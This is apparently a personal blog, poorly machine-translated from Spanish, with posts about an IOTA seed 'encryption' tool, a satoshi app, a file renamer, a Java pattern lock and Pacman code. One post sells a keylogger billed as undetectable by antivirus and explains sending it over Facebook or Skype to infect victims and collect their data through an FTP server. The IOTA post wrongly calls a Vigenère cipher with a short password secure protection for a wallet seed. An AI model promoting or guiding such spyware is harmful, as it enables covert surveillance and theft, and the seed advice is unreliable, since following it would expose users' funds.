miércoles, 6 de diciembre de 2017

protect or encrypt my seed of iota wallet

a security problem has become to protect the password of the wallet of official iota since it does not have a username and password, for which anyone who has your iota address can enter and send transferecnias to other wallets, a few days ago a friend step that had more than $ 12,000 dollars in iotas the new digital cryptocurrency that goes up as foam, but as we can protect ourselves from copying our seed of iota here we have the solution.

everything began evaluating the seed of iota which for a strong security must have 81 characters the next program of cryptography has that option, but it is not all we have to do, we must camouflage that address to be able to leave it on the pc, for that we are going to download the following program called vigeptore cryptography.

sw vigeptore cryptography

Once downloaded we open it, at the top a field will appear that says "clave" a and we will colcoar a password that you remember, this password should not forget it or if you are not lost I for example will put "cat"

then we will paste our seed of iota if we have it if we do not create a new one by clicking on "seed 81 characters" but if we already have our iota address or iota password already created we paste it in the field where it says "mensaje -> "

after this we go to where it says "crear cryptograma" automatically give us the encrypted or encrypted seed which can be saved on the pc and anyone can see it without risk of stealing the seed of iota because it is encrypted with a password cryptography vigenere.

when we want to decrypt we remember the password that we put above remember that I put "cat" if they put another will not tell you the original seed and will tell you another because with this encryption it is very difficult for a hacker to steal our password.

now we only save these characters encrypted in any pc or print it when we want to decrypt the characters just open the program and go to the bottom where it says "decrypt cryptogram" a and we put the encrypted characters and we give in that button "desencriptar cryptograma- -> "

this is one of the most secure ways to protect a password string of 81 characters of iota a password like 2 passwords, this program I always use it to protect my passwords and passwords with double password

domingo, 12 de febrero de 2017

Minar bitcoins and satoshis free app play store

Your balance: 2000 satoshis or come back tomorrow is an example of this application that grants satoshis free every 30 minutes the only thing you must do is download the application in play store:

 1- Place your email of xapo and a different password to the one of xapo to register you for example:

2- after registration you log in and you are already in the application:

domingo, 5 de febrero de 2017

Rename files in a folder in alphabetical or numeric order

You have encountered a world of images or files named in a strange way or with very long names that program will help you list and rename these files so that they remain in an orderly and clean

The first thing to do is to download the file It only weighs 1.5 megabytes You can find it below this post
1-to download the file will be an executable which we open and run as administrator and we will get an image like the following:

We choose the appropriate language or language that you handle.

2.luego nos saldra una pantalla como al siguiente:

3-We must choose the directory or folder where we have all those images or files that we wish to order, we also choose if we want them to change illiteracy or numerically 

4-press the button everything will be ready and all your files will be organized alphabetically or numerically depending on the button you have chosen:
We must clarify that the free version only supports 100 files and the pro version of more than 100000000 files

5-we can buy the license with paypal:
Buy here


viernes, 19 de agosto de 2016

android pattern developed in java for windows desktop pc

good guys here developing applications I started thinking it would be good an application that mimics the pattern of android but developed in java, here I bring this I realize which was not much trouble as in netbeans buttons or interface are easy to handle same with the events as if you put the mouse over the line to make the pattern.

the program gives you the key numbers that is used to tell whether or not fit, serious security password pattern in numbers

You can download the .exe to try it from your pc remember to have java installed on your computer.

You can download the .exe to test from your pc remember to have java installed on your computer.

you can buy from your paypal value $ 15 dollars you get the code directly to your email

Best Remote Spy keylogger undetectable to Antivirus

at the moment this in version 2.0, ire developing this application to completely finish used it a lot in my time so to speak indigenous malice share with you today to make it commercial.
the program has a free license for 5 days      you can buy the license on this page below with PayPal
descargar remoto andres2288 el mejor espia indectetable

the first thing to do is register
As the following image shows us a login after the registration:

the program automatically look if you have any user like yours, it should look good, or else change the user, once you registered must close the program and reopen it I checked with the user andres2288 as the following image:
immediately we will get a window where we can configure our FTP server which will give us access to the PC on the other side of the world or another country without nesesidad to access the =):

fill the data they ask us, FTP and then we Clickc on "ACTUALIZAR DATOS"

finally proceed to download the file sent by facebook or skype to infect the person with the spy, it is important to remember that the victim must have java installed on your computer here is where our social engineering comes ok


mensual by month

sábado, 5 de marzo de 2016

patron android desarrollado en java para escritorio windows pc

bueno muchachos aqui desarrollando aplicaciones me puse a pensar que bueno seria una aplicacion que imite el patron de android pero desarrollado en java,aqui les traigo este que yo realize el cual no fue mucho problemas ya que en netbeans los botones o interfaz son faciles de manejar igual con los eventos como si pones el mouse encima para hacer la linea del patron.

el programa te entrega la clave en numeros que es la que se utiliza para decir si entra o no ,seria la contraseña de seguridad del patron en numeros

puedes descargar el .exe para ensayarlo desde tu pc recuerda tener java instalado en tu equipo.

puedes comprarlo desde tu paypal valor $15 dolares el codigo te llega a tu correo directamente

domingo, 19 de julio de 2015

Codigo pacman ó ComeCocos en java

bueno este es un juego en el cual pude modificarlo por que no funcionaban las imagenes, el cual quiero que compartan para que otros usuarios lo encuentren primero vamos a empezar con la interfaz

crearemos una clase llamada  Pacman que va ser un JFrame

la entrada esta siendo modificada